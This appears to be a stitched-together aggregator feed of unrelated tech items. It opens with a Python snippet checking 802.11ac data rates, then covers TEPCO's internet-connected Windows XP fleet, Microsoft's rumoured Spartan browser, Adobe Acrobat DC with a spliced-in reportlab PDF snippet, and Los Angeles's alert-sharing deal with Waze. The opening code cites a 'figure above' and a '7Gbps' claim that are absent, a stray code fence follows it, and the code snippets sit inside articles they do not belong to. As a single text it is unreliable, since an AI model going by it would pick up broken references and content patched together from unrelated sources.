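# 802.11ac (VHT) PHY-rate check at MCS 9: 256-QAM (8 bits/symbol),
# rate-5/6 coding, 3.6 us symbols (short guard interval).
DATA_SUBCARRIERS = {20: 52, 40: 108, 80: 234, 160: 468}  # per channel width (MHz)

def vht_rate_mbps(width_mhz, streams, bits=8, coding=5 / 6, symbol_us=3.6):
    return DATA_SUBCARRIERS[width_mhz] * bits * coding * streams / symbol_us

print(vht_rate_mbps(160, 1))  # ~866.7 Mbps: the per-channel figure above
print(vht_rate_mbps(160, 8))  # ~6933 Mbps: the "just shy of 7Gbps" maximum
print(vht_rate_mbps(80, 2))   # ~866.7 Mbps: a typical 2-stream 80MHz laptop link
```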
-
The Tokyo Electric Power Company (TEPCO) has been under intense scrutiny ever since the 2011 meltdown at the Fukushima Daiichi nuclear energy complex. Following an investigation by Japan’s Board of Audit, TEPCO has been told to upgrade its computer systems. That doesn’t sound particularly unusual, except that TEPCO operates more than 48,000 PCs all running Windows XP. Oh, and they’re connected to the Internet.
The Board of Audit is digging into TEPCO’s finances largely because the Japanese government wants the company to pay for ongoing cleanup efforts around Fukushima. It’s no surprise either. The 2011 meltdown was the largest nuclear disaster since Chernobyl in 1986. Decommissioning the plant is expected to cost tens of billions of dollars and take 30-40 years. No one is alleging that Windows XP was the cause of the disaster, of course. Power plant infrastructure runs on more robust embedded platforms, though TEPCO didn’t plan ahead very well in the case of Fukushima. The chain of events that led to the runaway fission reaction has been thoroughly investigated, from the tsunami to the system failures that prevented reactor shutdown. The heavy reliance on Windows XP could, however, be seen as more evidence of complacency within TEPCO.
Windows XP was released in 2001, and enjoyed update support from Microsoft for more than a decade until it was finally cut off in 2014. That was after several extensions due to the poor performance of subsequent versions of Windows. A lack of security patches means XP systems will be vulnerable to any and all security flaws that are discovered going forward. This might not be a huge deal if the TEPCO computers weren’t connected to the Internet. TEPCO was reportedly aware of how dated its systems were (it would be hard not to be), but had actively chosen to keep using XP until at least 2019 as a cost-saving measure. That means TEPCO workers would be using 18-year-old software by the time it was upgraded. It is possible for businesses to pay Microsoft large sums of money for custom XP support, but obviously TEPCO was not doing that.
The Board of Audit calls this out as not only catastrophically unsafe, but not even likely to result in cost savings. Supporting ancient operating systems like this only gets harder as hardware and software move on to more modern platforms. TEPCO has reportedly agreed to make the upgrades. But really, it shouldn’t have taken a government audit to convince an operator of nuclear power plants that using outdated, insecure computers is a bad idea.
1 point
-
There are claims that Microsoft is to retire its Internet Explorer web browser and replace it with an all-new browser called Spartan with the upcoming release of Windows 10. As of February 2015, Internet Explorer's (IE) market share had slipped to second place at around 17%, while Google's Chrome browser boasted more than 42%. One clear challenge for Microsoft is that it has always been committed to producing its own browser for its own Windows operating system (supporting IE on Apple Macs only for a brief period). Apple, on the other hand, is happy to produce versions of its Safari browser for both Mac OS X and Windows, and Google produces versions of Chrome for every popular desktop and mobile operating system. Perhaps Microsoft feels it's time to take some action – in which case, what is it trying to accomplish?
A quick history
IE was introduced as an add-on for Windows 95 and was a key part of the internet boom of the 1990s. Bundled free in all subsequent versions of Windows, it soon gained dominance, winning the browser war against its older competitor, Netscape. With a browser share that grew to be as substantial as Microsoft Windows' dominance of the operating system market, Microsoft was subject to numerous anti-trust litigation cases in the US and Europe. Nevertheless, some of the HTML elements introduced in IE, and the fact it was more forgiving of badly coded websites than Netscape, meant that IE had a lasting influence on web design and the way websites were designed. This was especially so for internal corporate websites, which often used Windows-based systems.
In the 2000s, disquiet over Microsoft's anti-competitive behaviour and IE's lack of proper standards support led to a flourishing of competitors, boosted by the open sourcing of Netscape, which would become the basis for the popular Firefox browser. In reaction to Microsoft's approach of pushing its own technologies and ignoring open standards, the appeal of the more rigorous web standards compliance demonstrated by other browsers, including Opera, Safari and Chrome, has since carved away at IE's dominance. Additionally, IE became one of the worst offenders for security vulnerabilities. Since then, it's become the browser everyone loves to hate.
1 point
-
No doubt you've run across your share of PDF documents in your work and personal life. Adobe's Portable Document Format has become a common way to publish newsletters, instruction manuals and even tax forms. Creating your own PDF document is easy, with features built into major Web browsers and Apple's Mac system, or available through an array of free Windows apps. So why pay $156 or more a year for Adobe's Acrobat DC service? You get those free capabilities in one place, plus features for filling out forms, appending digital signatures and making changes on the go.
___
THE BASICS
Many people already use Adobe's free Acrobat Reader for reading documents. But to create documents, you need to pay for Acrobat, or use a free PDF creator from an outside party. Not all PDF creators are the same, though. Some convert text to graphics, for instance, so you're unable to search documents later. And editing capabilities tend to be limited and cumbersome. I create a lot of PDF files instead of printing out records. Free tools are typically adequate for that, but Acrobat is much easier for rotating and reordering pages and combining multiple PDF documents into a single file. Acrobat also makes it easy to edit text and convert documents back to their original form, whether that's in Word or a Web page. Adobe Systems Inc. also makes an iPad version, though with fewer features. Versions for iPhones, Android and Windows Phone devices have even less. Files you create and edit will sync through Adobe's Document Cloud storage service. All this comes with Acrobat DC.
1 point
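As a taste of the free alternatives the column mentions, here is a minimal sketch using the open-source reportlab Python library (one example of free PDF tooling, not one of the products named above, and no substitute for Acrobat's editing features):
```python
# Minimal PDF creation with the open-source reportlab library
# (pip install reportlab). Basic document creation needs no paid tooling.
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter

c = canvas.Canvas("newsletter.pdf", pagesize=letter)
c.setFont("Helvetica", 14)
c.drawString(72, 720, "My Newsletter")            # coordinates in points; 72 pt = 1 in
c.setFont("Helvetica", 11)
c.drawString(72, 700, "Created without Acrobat.")
c.showPage()                                      # finish page one
c.save()                                          # write newsletter.pdf to disk
```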
-
Alerts about hit-and-runs and kidnappings in Los Angeles will soon pop up on the traffic app Waze, along with road closure information, the West Coast city's mayor said. The agreement is part of a data-sharing partnership between LA and the Google-owned tech company announced by Mayor Eric Garcetti. The app has already begun showing street closures and will start including hit-and-run alerts and the so-called Amber Alerts sent out for kidnappings in the coming months. "This is going to be updated in real-time, every two minutes, giving motorists the information they need to... get home for dinner in time," said Garcetti.
The agreement to add notifications about hit-and-run and kidnapping alerts was reached Monday "in a very good meeting" between Waze and LAPD Chief Charlie Beck, the mayor said. In January, it emerged that Beck had sent a letter to the tech company's CEO lamenting that the Waze application posed a danger to police because of its ability to track their locations. The LAPD chief said at the time that the shooter in a recent double murder of two New York police officers had used the application to track the location of cops.
1 point